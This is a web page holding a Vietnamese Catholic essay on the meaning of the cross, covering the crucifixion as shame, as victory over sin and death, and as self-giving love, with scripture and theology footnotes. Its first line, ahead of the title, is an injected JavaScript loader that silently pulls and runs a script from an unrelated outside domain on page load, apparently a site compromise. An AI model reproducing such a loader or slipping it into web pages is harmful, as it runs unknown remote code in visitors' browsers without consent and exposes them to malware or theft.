;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ý NGHĨA CỦA THẬP GIÁ – Xitô PS

Ý NGHĨA CỦA THẬP GIÁ

Những người theo chủ nghĩa duy vật và vô thần cho rằng: khi khoa học kỹ thuật phát triển thì tôn giáo sẽ biến mất. Điều này hoàn toàn sai lầm. Khi nhìn vào xã hội ngày nay, một thời đại được mệnh danh là 4.0, thời đại của khoa học và kỹ thuật vậy mà vẫn có nhiều giáo phái mới xuất hiện và vẫn thu hút đông đảo dân chúng đi theo. Mỗi tôn giáo đều muốn lôi kéo các tín đồ của các tôn giáo bạn hoặc những người không có tôn giáo về với đạo của mình và cho rằng đạo của mình là nhất. Bên cạnh những giáo phái mới và những tôn giáo cổ xưa, hình ảnh thập giá – biểu tượng của Kitô giáo vẫn được nhiều người tôn thờ và bước theo cho dù phải bỏ cả tính mạng. Vậy đâu là ý nghĩa của thập giá và biểu tượng thập giá của Kitô giáo muốn nói lên điều gì?

  1. Thập giá dưới cái nhìn của dân ngoại

Trong mắt của dân ngoại, thập giá là một sự sỉ nhục và Kitô hữu là những kẻ điên rồ khi tôn thờ một người bị đóng đinh trên thập giá như lời thánh Phaolo đã nói: “Trong khi người Do thái đòi hỏi những điềm thiêng dấu lạ, còn người Hy lạp tìm kiếm lẽ khôn ngoan, thì chúng tôi lại rao giảng một Đấng Kitô bị đóng đinh, điều mà người Do thái coi là ô nhục không thể chấp nhận, và dân ngoại cho là điên rồ[1]. Vì đối vời họ thập giá là một hình phạt, một sự ô nhục. Không một vị thần nào lại chọn hay chấp nhận một cái chết như vậy. Hình phạt đóng đinh vào thập giá đã có từ lâu và đã được Alexander Đại đế áp dụng khi trị vì vào năm 300 TCN, kế đến là người La Mã (năm 100 TCN). Đó là một nhục hình nghê sợ nhất dành cho những tên bạo động. Hình phạt này không những đáng sợ mà còn là một sự sỉ nhục đối với phạm nhân. Họ phải vác thanh ngang của thập giá từ nơi xét xử đến nơi hành hình để cho dân chúng bêu diếu, khạc nhổ, bị lính đánh đập, hành hạ và cuối cùng bị lột trần và treo lên thập giá.[2] Phạm nhân bị đóng đinh hoặc bị cột vào thập giá và sẽ bị chết lần mòn vì ngạt thở hoặc kiệt sức.

Trong mắt mọi người thập giá là một sự chết chóc, là sầu thảm, là đau khổ, là tội ác… Chẳng ai muốn mình phải chịu hình phạt này và cũng không muốn liên lụy đến kẻ bị treo trên nó. Trong đế quốc Roma, những công dân của họ dù có thấp hèn đến mấy cũng không phải chịu án phạt này trừ khi họ bị tước đoạt quyền công dân.

  1. Thập giá, biểu tượng của chiến thắng

Trong mắt những người thời Chúa Giêsu và ngay cả các môn đệ của Người, thập giá là một sự thất bại, là dấu chấm hết cho cuộc đời của Chúa Giêsu và những môn đệ đi theo Người. Khi Thầy Giêsu bị đóng đinh và chết trên thập giá, các môn đệ đã bỏ chạy, buồn rầu, thất vọng trở về quê để tiếp tục những công việc còn dang dở. Nhưng qua biến cố Phục Sinh, các môn đệ mới nhận ra ý nghĩa của thập giá. “Thập giá như một cuộc thử thách Đấng Thiên sai phải trải qua, và việc sống lại như bằng chứng Ngài đã thắng cuộc. Đào sâu và tiến xa hơn, họ lồng biến cố ấy vào trong “mầu nhiệm cứu độ”, tức muốn nói rằng: “Đức Giêsu đã bị nộp, theo kế hoạch Thiên Chúa đã định từ trước” (Cv 2,23; 4,28). Thành ra cuộc tử nạn không phải là vô lý, không phải là dấu chứng của bất lực, trái lại, đó là “sức mạnh và khôn ngoan của Thiên Chúa” (1Cr 1,24); nói khác đi, là một phương thức cứu độ”[3].

+ Chiến thắng tội lỗi: “Theo thánh Gioan và thánh Phaolo, thì Đức Giêsu chịu chết trên thập giá là để xóa bỏ tội lỗi loài người. Tổ tiên chúng ta đã kiêu căng và bất tuân mệnh lệnh Thiên Chúa (St 3). Và tội lỗi của con cháu, tựu trung cũng chỉ là hai tội căn bản ấy. Mà ngày nay, Đức Giêsu Ngôi Hai đã khiêm nhường và vâng phục mệnh lệnh Chúa Cha. Người đã vâng phục đến nỗi vui lòng đi chịu chết trên thập giá. Nên cái chết của Đức Giêsu đem chiến thắng lại cho loài người đối với tội lỗi (Pl 2,8; Rm 5,19)[4].

+ Chiến thắng sự chết: xưa nguyên tổ là Adam và Eva đã phạm tội bất tuân Thiên Chúa nên phải gánh chịu hậu quả của tội lỗi là sự chết, nay nhờ Đức Kitô, qua cái chết của Người, Người đã giao hòa nhân loại với Thiên Chúa. “Hậu quả của tội lỗi là cái chết. Và chính cái chết mới đáng sợ. Nên nếu Đức Giêsu chỉ xóa bỏ tội lỗi cho loài người mà loài người vẫn phải chết, thì cái chết của Đức Giêsu gần như vô ích. Nhưng không, cái chết của Người chẳng những cứu loài người khỏi ách tội lỗi, khỏi án công bình của Thiên Chúa, nhưng còn trả lại cho loài người sự sống nữa. Quả thế, chẳng những Người đã khiêm nhường và vâng phục Thiên Chúa cha đến nỗi vui lòng chịu chết; nhưng ngày thứ ba, Người còn sống lại. mà sống lại như thế có nghĩa là Người xóa bỏ tội lỗi, mà còn xóa bỏ hậu quả của tội lỗi là cái chết. Thánh Phaolo viết: “Nếu tại một người mà loài người phải chết, thì cũng nhờ một người mà kẻ chết được sống lại” (1Cr 15,21; x. 1Cr 15,54-57)[5]

Chúa Giêsu đã chết và đã sống lại, qua đó cho ta thấy Ngài đã chiến thắng tử thần, chiến thắng quyền lực của sự dữ. Đó là trận chiến giữa Thiên Chúa và Satan (x. Mt 16,23; Lc 22,3.31.52; Ga 14,30). Chung cục, cuộc tử nạn là giờ phút quyết định lịch sử cứu độ, lúc mà lời tiên tri được ứng nghiệm (x. Tv 22; 41; 69; 87; Is 53; Dcr 13). Lúc này ta mới hiểu tại sao sự điên rồ của thập giá chính lầ khôn ngoan của Thiên Chúa (1Cr 1,23); bởi lẽ sự kiện lịch sử ấy chính là yếu tố cấu tạo nên mầu nhiệm Đức Kitô và kế hoạch cứu độ[6].

Từ một vật biểu tượng cho sự chết chóc, sự ô nhục, Thiên Chúa đã dùng những nghịch lý ấy để cứu độ loài người: “Thập giá cho thấy Thiên Chúa dùng một vật ô uế nhất là xác chết (x. Lv 21,11) làm nguyên nhân thanh luyện loài người. Vật bị nguyền rủa đối với Luật thì Thiên Chúa đã dùng để chuộc lấy con người. “Khi một người có tội đáng phải án chết đã bị xử tử, và anh em đã treo nó lên cây, thì xác nó không được để qua đêm trên cây, nhưng anh em phải chôn ngay hôm ấy, vì người bị treo là đồ bị Thiên Chúa nguyền rủa”.[7]

  1. Thập giá, biểu tượng của tình yêu trao hiến

Chúng ta dễ dàng thấy “đặc trưng trong hầu hết các tôn giáo khác, tín điều về sự hy sinh chuộc tội của Đấng Cứu Rỗi đều vắng mặt, hoặc vô cùng méo mó. Chẳng hạn, trong Do thái giáo, người ta tin rằng tội lỗi nguyên thủy do Adam và Eva gây ra không áp dụng cho con cháu của họ, và do đó, việc đóng đinh Chúa Kitô không phải là một hành động cứu người khỏi cái chết vĩnh cửu. Điều tương tự cũng có thể nói về đạo Hồi, nơi việc giành được hạnh phúc thiên đàng được đảm bảo cho tất cả những người thực hiện chính xác yêu cầu của kinh Koran. Nó không chứa ý tưởng chuộc tội hy sinh và Phật giáo, cũng là một trong những tôn giáo hàng đầu thế giới[8], họ được giải thoát là tự sức họ chứ không có một Đấng nào khác đến để cứu họ.

Trái lại, Thiên Chúa của Kitô giáo không phải là một Thiên Chúa chỉ ở trên cao và trừng phạt con người khi họ lầm lỗi mà là một Thiên Chúa nhập thế và nhập thể. Ngài đã từ bỏ địa vị cao sang để mặc lấy thân phận phàm nhân, ngoại trừ tội lỗi[9]. Không những thế Ngài còn chết đau đớn và nhục nhã trên thập giá vì tình yêu và để cứu chuộc con người.

Khi dựng nên con người, Thiên Chúa đã tặng ban cho con người món quà quý giá là tự do nhưng con người lại dùng chính sự tụ do đó để kiêu căng, để bất tuân và bị sa ngã. Biết bao lần con người đã bất tuân và phản bội Thiên Chúa nhưng Thiên Chúa vẫn không bỏ rơi con người. Ngài đã dùng các ngôn sứ để thức tỉnh nhân loại nhưng họ vẫn không chịu hoán cải và cuối cùng Ngài sai chính Con Một của Ngài đến để cứu độ nhân loại[10].

Khi nhìn vào thập giá với hình ảnh của một người bị đóng đinh chết một cách đau đớn và tủi nhục, thân xác bị rách nát vì roi đòn đã khiến nhiều người phải khiếp sợ. Nhưng qua hình ảnh và cái chết đó mới diễn tả hết được tình yêu tột cùng của Thiên Chúa. Chúa Giêsu đã nói với các môn đệ: “Không có tình thương nào cao cả hơn tình thương của người đã hy sinh tính mạng vì bạn hữu của mình[11] và Ngài đã minh chứng điều đó bằng chính cái chết của mình trên thập giá, một hình phạt nặng nhất mà con người thời đó dành cho những những tên tội phạm khét tiếng và những kẻ bạo động. Ngài đã yêu con người bằng một tình yêu nhưng không. Một tình yêu chỉ có nơi Thiên Chúa – Agape, một tình yêu không vụ lợi, không tính toán.

Nếu ta so sánh hình ảnh của Đức Phật và Đức Kitô, ta sẽ thấy có nhiều điểm giống nhau[12] nhưng cũng có rất nhiều điểm khác biệt, đặc biệt là về xuất thân, giáo lý và cái chết của các Ngài: Đức Phật là một hoàng tử, được sinh ra trong cung điện giàu sang, phủ phê tiệc tùng và khoái lạc đến nỗi phải nhờm tởm mà trốn đi khỏ nhà cha mẹ, còn Đức Giêsu lại sinh ra trong một hang lừa, thiếu thốn đủ thứ, làm công việc của một người thợ mộc bình thường. Giáo lý của Chúa Giêsu không phải theo con đường tâm linh huyền bí và xa lánh thế gian nhưng Ngài kêu gọi người ta hoán cải thay vì bảo người ta bỏ ý riêng. Ngài kêu gọi mọi người hướng ý chí của mình theo đúng ý hướng của Thiên Chúa. Thế giới đối với Chúa Giêsu chẳng phải là một thực tại vô giá trị khiến người ta phải xa lánh. Cái chết của Đức Phật diễn ra thật êm ái, không phải kinh qua đau thương và khốn khổ; trái lại, Đức Giêsu chết đầy đau thương và tàn bạo, đau khổ, lẻ loi và tủi nhục[13].

Hình ảnh của Đức Giêsu bị đóng đinh trên thập giá trái ngược với hình ảnh của một Đức Phật thanh thản, siêu thoát, hạnh phúc, mãn nguyện ngồi trên đóa hoa sen nhưng đó lại là hình ảnh đẹp của người trao hiến tất cả cho người mình yêu. Trao ban đến giọt máu cuối cùng, không giữ lại cho mình chút gì ngay tả tấm áo che thân.

Kitô giáo không phải là tôn giáo tôn thờ sự đau khổ, sự yếu nhược hay hèn nhát nhưng là tôn thờ một tình yêu vĩ đại, một Thiên Chúa đã yêu thương con người hơn chính Con của mình. Nếu như Phật Giáo cố gắng để diệt khổ, diệt tất cả những gì thuộc bản chất của một con người thì Đức Giêsu lại đón nhận nó và mang cho nó một ý nghĩa mới. Đức nguyên Giáo hoàng Benedicto XVI đã nói: “Thường thường người ta có thói quen chạy trốn đau khổ bằng mọi cách. Và không có gì gây bực tức cho xã hội mạnh hơn, là quan điểm của Kitô giáo cho rằng phải chấp nhận đau khổ, để nhờ đó thắng vượt nó. Đức Giáo hoàng Gioan Phaolo II tin rằng “đau khổ là một ẩn số của cn người”. tại sao?

Nhân loại ngày nay đang tìm cách đẩy đau khổ ra khỏi thế gian. Đối với từng cá nhân, điều đó có nghĩa là phải làm sao tránh bị đau khổ. Nhưng người ta cũng phải thấy rằng, như vậy thì thế giới sẽ hóa ra rất lạnh lẽo, rất khó sống. Đau khổ là một thành tố của kiếp người. Và ai thực sự muốn diệt đau khổ, người đó tất cũng phải hủy tình yêu; không có đau khổ thì chẳng có tình yêu, bởi vì tình yêu luôn đòi hỏi phải từ bỏ một phần chính mình, bởi vì tình yêu, tùy theo tâm tính mỗi người và mức độ tình huống, cũng luôn kéo theo với nó sự từ bỏ và đau khổ.

Nếu ta biết con đường tình yêu cuộc xuất hành, ra đi khỏi mình là con đường thật để thành người, thì ta cũng hiểu rằng đau khổ là con đường thật để thành người, thì ta cũng hiểu rằng đau khổ là tiến trình trưởng thành. Ai sẵn sàng chấp nhận đau khổ, người đó trưởng thành hơn, hiểu người khác hơn, là người hơn. Ai trốn tránh đau khổ, kẻ đó không hiểu tha nhân, sẽ trở nên vị kỷ, tàn bạo.

Chính tình yêu là một cực hình, một chịu đựng. Thoạt tiên tôi cảm nghiệm được trong nó nỗi sung sướng, tôi kinh nghiệm được hạnh phúc thật. Mặt khác, đối lại, tôi cũng phải bước ra khỏ sự yên lành thoải mái của tôi, và phải chấp nhận mình thay dình đổi dạng. Nếu ta bảo, đau khổ là mặt trái của tình yêu, thì ta cũng hiểu được việc học đau khổ quan trọng là dường nào, và ngược lại, cũng hiểu được tại sao việc tránh đau khổ làm cho con người mất khả năng sống. Trường hợp này, đời ta chỉ còn là trống rỗng, rồi có thể chỉ còn lại bực tức, khước từ, hết còn trưởng thành, hết còn biết sẵn sàng chấp nhận”[14].

“Kinh Thánh cho thấy phong cách hoạt động của Thiên Chúa đối với loài người theo dạng nghịch lý. Thập giá cho thấy Thiên Chúa dùng một vật ô uế là xác chết (x Lv 21,11) làm nguyên nhân thanh luyện loài người. Vật bị nguyền rủa đối với Luật (x. Đnl 21,22-23), thì Thiên Chúa đã dùng để mà chuộc lấy con người cho khỏi bị nguyền rủa (x. Gl 3,13). Lòng nghen tương thù hận đã giết chết Đức Kitô, thì Thiên Chúa đã dùng để phá hủy sự thù ghét (x. Ep 2, 14.16) và để mặc khải tình thương vô biên của Người đối với thế gian (x. Ga 3,16)[15].

Trên thập giá, Chúa Giêsu, đã đáp trả lại tất cả mọi bất công và hận thù lòng bao dung tha thứ. Thập giá Đức Kitô không chất chứa hận thù, oán ghét mà luôn mang dáng đứng của tình yêu và sự khoan dung tha thứ. Trên thập giá, Chúa Giêsu đã cầu nguyện cùng Chúa cha: “Xin Cha tha tội cho chúng vì chúng không biết việc chúng làm”. Đức Kitô cũng là gương mẫu của một con người hoàn hảo cho. những ai bước theo Người.

Qua những gì vừa trình bày và qua cái chết của Chúa Giêsu trên thập giá, Đức Kitô đã mang lại cho thập giá một ý nghĩa mới: thập giá không còn là cây của sự chết, của sự thất bại nhưng nó đã trở nên thánh giá để cứu chuộc muôn người. Giờ đây chúng ta có thể thấy hình ảnh của thập giá ở khắp nơi: trên vương miện của các vua chúa thời xưa, trên nóc các ngôi Thánh Đường, ngoài nghĩa trang… và ngay cả trên người của các Kitô hữu. Họ đeo thánh giá trên mình không chỉ để làm vật trang sức mà còn để tưởng nhớ đến Đấng đã chết vì mình, Đấng đã yêu thương mình đến hơi thở và giọt máu cuối cùng. Không những thế, thập giá còn gợi cho mọi người hiểu rằng đó còn là con đường mà bất cứ ai cũng phải kinh qua rồi mới đến được vinh quang.

Qua hơn 2000 năm, hình ảnh của cây thập giá vẫn đứng vững dù phải trải qua bao thăng trầm. Thập giá không còn là biểu tượng của sự chết nhưng là biểu tượng của Kitô giáo. Ở đâu có thập giá, ở đó có sự hiện diện của các Kitô hữu. Rất nhiều người đã lấy cái chết của mình để minh chứng cho niềm tin và tình yêu của mình cho Đấng đã hy sinh và chết trên thập giá. Ngày nay những người bước theo Thầy Giêsu không còn phải sợ hãi tránh né để khỏi liên lụy đến mình nhưng dám hiên ngang tuyên xưng và lưu truyền về Đấng đã chết trên thập giá và tình yêu của Ngài. Giờ đây khi nhìn vào thập giá, ta không còn phải ghê sợ vì một nhục hình khủng khiếp nữa nhưng đó là một tình yêu đẹp nhất của một vị Thiên Chúa Tình Yêu.

[1] 1Cr 1,22-23.

[2] X. http://Công giáo thế giới, tử hình trên thập giá

[3] Filipe Gómez, SJ, Kito học, thần học tín lý 2, Nxb. Anton & Đuốc Sáng, tr. 337.

[4] Lm. Tanila Hoàng Đắc Ánh, Lịch sử cứu độ, Nxb Tôn Giáo, 2008, tr. 80.

[5] Lm. Tanila Hoàng Đắc Ánh, sđd, tr. 81.

[6] X. Filipe Gómez, sđd, tr. 337.

[7] Đnl 21,22-23; Filipe Gómez, sđd, tr. 338.

[8] Sự đóng đinh của Chúa Kito: ý nghĩa và biểu tượng Kito giáo-2020, http://vi.verdauung-info.com/4333288…

[9] X. Pl 2, 6-11.

[10] X. Dt 1,1.

[11] Ga 15,13.

[12] X. Lm. Vương Đình Bích biên dịch, Đức tin Kito giáo hôm qua và hôm nay, 2007, tr. 22-25.

[13] X. Lm. Vương Đình Bích biên dịch, Đức tin Kito giáo hôm qua và hôm nay, 2007, tr. 26-30.

[14] Joseph Ratzinger, Thiên Chúa và Trần thế, Nxb Tôn Giáo, 2011, tr. 326-327.

[15] Filipe Gómez, SJ, Kito học, thần học tín lý 2, Nxb. Anton & Đuốc Sáng, tr. 338.

Thanh Phong

You May Also Like

Trả lời

X